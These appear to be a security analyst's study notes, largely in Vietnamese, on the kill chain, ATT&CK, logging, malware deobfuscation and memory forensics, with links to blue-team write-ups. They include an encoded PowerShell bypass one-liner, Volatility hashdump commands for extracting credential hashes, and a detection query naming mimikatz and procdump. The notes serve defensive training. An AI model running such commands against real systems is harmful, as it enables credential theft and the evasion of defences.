CYBER KILL CHAIN
1. Hệ điều hành: service, process, thread, user, group permission, cho phép khởi tạo cùng windows
Các loại log, event id quan trọng thường xuyên gặp phải
2. Network security: protocol quan trọng, kĩ thuật tấn công phổ biến, phân tích tấn công trên network
3. Cyber kill chain: khi kẻ tấn công xâm nhập vào máy tính và tiến hành scan thì map đc với giai đoạn nào trong cyber kill chain
APT đang ở mức nào,
4. Logging: Sysmon, security, audit log, dhcp, http, system, application, terminal, smb, powershell, dns, bash cmd log (Linux), security (Linux: authen, author, accounting), ssh (Linux): 4624, 4625...
Tấn công từ A-> B thì trên B có những loại log gì, lên alert gì
5. Sử dung các sản phẩm của mình: để filter một lệnh thì phải làm như thế nào? ví dụ muốn lấy dll trên một máy tính thì dung tính năng gì? event gì
6. quy trình, nguyên tắc để làm tốt vị trí của tier 1.
show cảnh báo thực tế và phân tích để xác định xem có phải tấn công không? tấn công gì?
==========================================
Tại sao phải học Cyber Kill Chain, APT?
APT vs targeted attacks?
- APT là một loại tấn công có chủ đích. (có mục tiêu rõ ràng)
- Persistent: dai dẳng, bền để đạt được mục đích, có tiềm lực về tài chính, nguồn lực về con người, thời gian,...
- Advanced: sự nâng cao, phức tạp của kĩ thuật tấn công, khó để phát hiện.
Cyber Kill Chain: Phải hiểu được cảnh báo đang ở giai đoạn nào?
có 3 trường phái thông tin khác nhau: Lockheed martin
- Reconnaissance
- Weaponization: payload khai thác lỗ hổng, file chứa link độc hại (spraying password).
- Delivery: USB cắm vào autorun, email, web: SQLi (có file độc hại rồi đăng lên trên các diễn đàn, mạng xã hội), OTT, SMS, Media message
- Exploitation: khai thác sử dung malware có từ trước.
- Installation: hiding file
- Command and Control: reverse shell, bind shell, DNS tunneling, IMCP tunneling, TCP socket, remote desktop tunneling 127.0.0.1 (port forwarding); login type 10 source 127.0.0.1 remote desktop tunneling
https://cloud.google.com/blog/topics/threat-intelligence/bypassing-network-restrictions-through-rdp-tunneling/
- Actions on Objectives: gửi file ra ngoài với hơn 1GB, gửi nhiều file zip ra ngoài với mật khẩu, dump mật khẩu
Dùng google search để liệt kê 10 website có một lỗ hổng CVE nào đó?
10 tài khoản email có domain là Viettel.com
liệt kê 10 website đang public port 80:443 mà chạy bằng php.
Tìm và đọc một số bài phân tích email phát tán macro độc hại: tìm cách làm lab hoặc đọc, tạo một file office chứa macro độc hại
Trên Linux có bn cách để khởi chạy cùng Linux? cronjob, sử dung SSH key, local account, shell configuration modification?, file bashrc, webshell
https://www.cyberark.com/resources/threat-research-blog/persistence-techniques-that-persist
https://hackersploit.org/linux-red-team-persistence-techniques/
https://hadess.io/the-art-of-linux-persistence/
ssh từ A-> B; public key B, private thì mình giữ
tập hợp nhiều cron job thì gọi là gì?
/etc/profile thì thường hacker sử dung làm gì?
preload -> liên quan đến rootkit, file .so
phát tán phishing -> leo thang đặc quyền -> extract mật khẩu -> mở rộng phạm vi tấn công -> để lại persistence, backdoor -> kết nối C2 -> đi vào hệ thống để lấy dữ liệu -> ẩn mình
Cyber Kill Chain exambeam: https://www.exabeam.com/explainers/information-security/cyber-kill-chain-understanding-and-mitigating-advanced-threats/
Reconnaissance -> intrusion -> exploitation: có một chân rồi, và tìm cách khai thác them, leo thang đặc quyền, exploit tài khoản đặc quyền -> leo thang đặc quyền (thường có thông tin tài khoản) -> lateral movement -> obfuscation (anti-forensics) -> DoS -> Exfiltration
MITRE ATT&CK
Initial Access = Exploitation
Resource Development = Weaponization
Các bước thường xuyên tiếp cận cảnh báo: Recons, Persistence, Defense Evasion, Credential Access, Discovery, Lateral Movement,
có những kĩ thuật gì điển hình và lên cảnh báo gì?
https://www.jpcert.or.jp/english/pub/sr/20170612ac-ir_research_en.pdf
https://www.sans.org/posters/hunt-evil/
Tool: impacket-SMB-Server để lateral sang con khác.
có mấy yếu tố giúp tấn công thành công từ máy A-> B?
- phải mở dịch vụ
- nạn nhân phải có lỗ hổng
- tấn công smb: thông tin về tài khoản (thường là tài khoản đặc quyền), username & password, hash password, Kerberos ticket.
Leo thang đặc quyền:
https://info.veracode.com/rs/790-ZKW-291/images/privilege-escalaction-prevention-guide-2022-en.pdf
- schedule task cũng có thể là leo thang đặc quyền
https://juggernaut-sec.com/scheduled-tasks/
https://www.crowdstrike.com/cybersecurity-101/living-off-the-land-attacks-lotl/
- ingress tool: bitsadmin, powershell, wget, curl
LOL: tải file, phát tán file, chạy đc trên memory, sc.exe,
APT
Tìm 3-5 report liên quan đến APT, nắm keychain: APT32 OceanLotus, Lazarus group, Mustang Panda, fancy bear
---
https://blueteamlabs.online/home/challenges?category=ALL
https://ahmed-naser.medium.com/hacked-blue-team-challenge-walkthrough-write-up-86f3107b3af2
Q1-What is the system timezone?
/var/log/auth.log
Q2-Who was the last user to log in to the system?
Q3-What was the source port the user ‘mail’ connected from?
Q4-How long was the last session for user ‘mail’? (Minutes only)
Q10-Which user account was created by the attacker?
https://jawscyber.com/?p=38
Q4: Which PHP page is vulnerable to Remote File Inclusion (RFI)?
Memory Analysis – Ransomware
Using YARA To Verify Ransomware Flavour
https://jawscyber.com/?p=446
Create YARA rules with GHIDRA
https://www.youtube.com/watch?v=4Qo8aKi9aKw
Auto create yara rule
https://medium.com/@krzysztof.kuzin/btlo-write-up-eradication-809c5df070fb
SSH log
https://github.com/rehanoshba/writeups/blob/main/BTLO-%20Secure%20shell.pdf
https://sec.vnpt.vn/2024/02/review-wmi-tool/
https://www.crowdstrike.com/blog/how-to-detect-and-prevent-impackets-wmiexec/
# Phising
https://medium.com/btlo-investigation-solutions/btlo-countdown-b7092360917f
Using key to decode database.
What is the filename(including extension) that is received as an attachment via email?
What is the GPS location of the blast? The format is the same as found in the evidence
## pdf
https://medium.com/@krzysztof.kuzin/btlo-write-up-sharpattack-2b4f7162ff65
# Browser
https://medium.com/@krzysztof.kuzin/btlo-write-up-poor-joe-78d1f568ef5f
What were downloaded?
What is the password of the user Joe?
What is the social media domain visited?
# Deobfuscation and Static Analysis
https://sec.vnpt.vn/2022/10/tong-quan-ve-phat-hien-ma-doc/
https://jawscyber.com/?p=126
https://medium.com/btlo-investigation-solutions/btlo-pretium-db6d8e8b3608
What is the default user agent being used for communications?
extract all of the data from these ping packets.
https://medium.com/btlo-investigation-solutions/btlo-malicious-powershell-analysis-350bee4606b6
https://medium.com/ce-digital-forensics/analysing-metasploit-framework-shellcode-e66b89411000
## Deofuscate webshell
https://labs.detectify.com/how-to/tutorial-php-webshell-de-obfuscation/
### Beautify code
https://www.tutorialspoint.com/online_php_formatter.htm
### Convert hex
https://github.com/Chrissy-Morgan/PHP-Webshell-DeObfuscator
## Word
https://systemweakness.com/malware-analysis-of-a-emotet-word-document-6ccd1027fb2a
## Cheetsheet
https://bohansec.com/2021/04/30/Maclious-Powershell-Analysis-Video-Only/
decode text cyberchef
https://medium.com/mii-cybersec/malicious-powershell-deobfuscation-using-cyberchef-dfb9faff29f
https://malware.news/t/deobfuscating-powershell-putting-the-toothpaste-back-in-the-tube/23509
https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
https://www.tevora.com/threat-blog/5-minute-forensics-decoding-powershell-payloads/
https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/invoke-command?view=powershell-5.1
https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-5.1
https://learn.microsoft.com/en-us/powershell/module/Microsoft.PowerShell.Utility/Set-Alias?view=powershell-5.1
```
powershell.exe -NoE -Nop -NonI -ExecutionPolicy Bypass -C "$decodedScript = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABwAHIAbwBjAGUAcwBzACAAPQAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgAGMAYQBsAGMALgBlAHgAZQA='));Invoke-Expression $decodedScript"
```
* Don’t block the IP just yet. You want to identify all affected systems and determine if multiple C2’s are being used. Attackers like Fin7 have been known to use between 3-5 different C2’s for a single attack. (**many C2**)
* Do a **quick investigation** on any other affected hosts, so that you can give them the ban-hammer all at once. Otherwise you could end up playing whack-a-mole for a while.
* Review logs for all devices that connect back to the attacker’s identified IP
* Review all internal connections to and from the affected host (especially SMB traffic)
* Review all external connections to and from the affected host (including DNS traffic)
* Multiple threat actors use DNS traffic for C2 and to avoid detection.
* Review the affected hosts for artifacts and persistence mechanisms (reg keys, scheduled tasks, emails, word docs, etc.)
* Review anomalous or suspicious activity from these hosts, such as connecting to dropbox, google docs, etc., to determine if data was exfiltrated.
* **Don’t start recovery until it’s certain the threat has been removed**. The last thing you want to do spend a ton of hours recovering (resetting passwords, reimaging, etc.) and then have to do it all over again for the same incident!
# IDA Analyst
https://medium.com/ce-malware-analysis/lab-5-ida-pro-bb7c7772dd99
https://medium.com/ce-malware-analysis/lab-6-c-code-constructs-in-assembly-e8f22078600c
# ELK
https://medium.com/@0x4C1D/try-hack-me-hunt-me-i-payment-collectors-walkthrough-5a26c86cd515
https://medium.com/@0x4C1D/try-hack-me-threat-hunting-foothold-walkthrough-845c3ec6723d
https://medium.com/@0x4C1D/try-hack-me-threat-hunting-pivoting-walkthrough-ebf1ab8b6a47
https://medium.com/@0x4C1D/try-hack-me-threat-hunting-endgame-walkthrough-18edf8565e9c
Commonly used techniques are listed below:
* Man-in-the-middle
* ARP / LLMNR Poisoning
* SMB Relay
* DHCP Spoofing
* Hijacking
* Traffic dump
* Keylogging
* Input capture
* Data collection from local/cloud/repositories
Some search example
https://medium.com/@krzysztof.kuzin/btlo-write-up-soc-alpha-1-cacbdbaa617a
https://medium.com/@krzysztof.kuzin/btlo-write-up-soc-alpha-2-f60743a968f8
What is the full command used for bypassing the defender scan on the malicious file?
https://learn.microsoft.com/en-us/powershell/module/defender/add-mppreference?view=windowsserver2022-ps
What is the full path of the exe used for dumping password?
```
Make windows defender don't check and file or folder.
Event_EventData_Image : (*mimi* OR *mimikatz* OR *procdump* OR *lsremora.dll* OR *lsremora64.dll* OR *dumpext.dll* OR *wceaux.dll* OR “mimidrv.sys”)
```
# Wireshark
https://www.linkedin.com/pulse/ph%C3%A2n-t%C3%ADch-h%C3%A0nh-vi-t%E1%BA%A5n-c%C3%B4ng-m%E1%BA%A1ng-th%C3%B4ng-qua-file-pcap-nguy%E1%BB%85n-%C4%91%E1%BB%A9c-t%E1%BA%A5n-yv0xc/
scdbg
http://sandsprite.com/blogs/index.php?uid=7&pid=152
https://medium.com/@bmaretyatp/malware-traffic-analysis-emotet-malware-e7abe00d7dc8
email activity
https://medium.com/@y0tz/malware-traffic-analysis-examining-emotet-infection-traffic-1357002076d2
# volatility
https://medium.com/@krzysztof.kuzin/btlo-write-up-poor-joe-78d1f568ef5f
What were downloaded?
Photorec to recover any file
What is the password of the user Joe?
What is the social media domain visited?
What is the decryption id Joe has to use in order to decrypt the files
find which file was packed with UPX
find the malicious process with malfind
Compiled Date of the Malicious Executable.
https://medium.com/@krzysztof.kuzin/btlo-write-up-total-recall-c02b0885a734
mans file
The user tried to download an .exe file to the system but cancelled it. What was the filename?
What user accounts were created by the insider?
What service was enabled by the attacker
https://kcsc.edu.vn/tetctf-2024-write-up?fbclid=IwAR1yM0QvWucCUD-dgpkk6YM2vQZTyc8OYLhaq0wzjYuUXcBVrlbqHfx6bk4#heading-preface
.ad file
https://hackmd.io/@Automic-Kaiii/HkWmhmzH2#Linux-is-hurt #build profile
https://github.com/volatilityfoundation/volatility/wiki/Command-Reference
https://andreafortuna.org/2017/07/31/volatility-my-own-cheatsheet-part-6-windows-registry/
https://sbasu7241.medium.com/otterctf-2018-memory-forensics-write-up-part-2-14bf86e3ab94
clipboard(pluggin) #copy-paste
https://odintheprotector.github.io/2023/09/20/hackthebox-truesecret.html
```
python vol.py -f <filename> imageinfo
python vol.py -f <filename> --profile=<profile_name> pslist
cmdline
python vol.py -f <filename> --profile=<profile_name> filescan | grep <sth>
```
MEMORY.DMP
## vol 3
python vol.py -f MEMORY.DMP windows.pslist
vol -f MEMORY.DMP windows.filescan > a.txt
vol.exe -f "MEMORY.DMP" windows.handles.Handles --pid 1736
vol -f MEMORY.DMP windows.dumpfiles --physaddr 0x7e3e2070
vol.exe -f "MEMORY.DMP" dumpfiles --pid 1736
## Autospy
https://medium.com/btlo-investigation-solutions/btlo-countdown-b7092360917f
## compare 2 snapshot file
regshot #tool
use for .hivu file
vmem file
## dump creadentials by hash
https://odintheprotector.github.io/2024/02/17/bitsctf2024-dfir.html
python3 volatility3-2.5.0/vol.py -f memdump-001.mem windows.hashdump
https://github.com/KMANVK/CTF_Wu/blob/main/MGCI-WLMAC%20Joint%20CTF%20Contest%20'21/Forgetful/solved.md
Recycle.Bin
https://www.4rth4s.xyz/2020/10/learning-memory-forensics-with.html
```
volatility -f <file_dump.raw> --profile=PROFILE hivelist
volatility -f <file_dump.raw> --profile=<profile> hashdump -y <SYSTEM offset> -s <SAM offset> > hashes.txt
volatility -f <file_dump.raw> --profile=Win7SP1x86_23418
```
cmdscan
vmem file
userassist (pluggin) (Print userassist registry keys and information)
https://blog.bi0s.in/2020/08/04/Forensics/Investigation-InCTFi2020/ (another way get info from registry ntuser.dat)
```
volatility -f windows.vmem --profile=Win7SP1x64 dumpregistry -o 0xfffff8a00256d010 -D .
python vol.py -f exemplar17_1.vmem iehistory
```
https://odintheprotector.github.io/2023/09/20/hackthebox-truesecret.html
https://gist.github.com/1259iknowthat/8cb818f0a37566b1fc25151ef074d9af
tc file
https://www.varonis.com/blog/how-to-use-volatility
network
https://0xdf.gitlab.io/2019/09/07/htb-bastion.html
vhd file
```
guestmount --add 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt/test
```
or use autopsy
https://hackmd.io/@Automic-Kaiii/By6L3Qil2
vhdx file
https://github.com/Malandrone/PowerDecode?
python3 vol.py -f forensics.mem linux.bash
volatility_gpg #test xem thử file mem có chứa pass ko
python3 vol.py -f forensics.mem -p volatility-gpg gpg_full
gpg --batch --yes -r "RansomKey" -o qgffrqdGlfhrdoE -e RxgXlDqP0h3baha
https://github.com/KMANVK/CTF_Trainee/blob/main/Task%201.md #find hostname
https://github.com/moaistory/WinSearchDBAnalyzer recover deleted records in Windows.edb
## browser history
https://medium.com/@huseyin.eksi/quick-forensics-on-google-chrome-c9fb3ffdc9ad
https://kcsc.edu.vn/tetctf-2024-write-up?fbclid=IwAR1yM0QvWucCUD-dgpkk6YM2vQZTyc8OYLhaq0wzjYuUXcBVrlbqHfx6bk4#heading-preface
https://systemweakness.com/extracting-saved-passwords-from-web-browser-1444dbfb6551
\Users\DuyTan-KMA\AppData\Local\Google\Chrome\User Data\Default\History
https://github.com/bquanman/CTF-Writeup/blob/main/ISITDTU%20CTF%20Final%202022/L34K%20-%20Misc(Forensics)%20-%20ISITDTUCTF%20Final%202022.md
https://github.com/KMANVK/CTF_Trainee/blob/main/Task%201.md
https://www.inversecos.com/2022/10/recovering-cleared-browser-history.html
https://odintheprotector.github.io/2024/01/28/tetctf2024-writeup.html
## dump the screen from memorydump
https://www.rootusers.com/google-ctf-2016-forensic-for1-write-up/
# Incident response
https://www.acunetix.com/blog/articles/how-to-recover-from-a-hacked-website/
Sign in with Wallet
Connect another wallet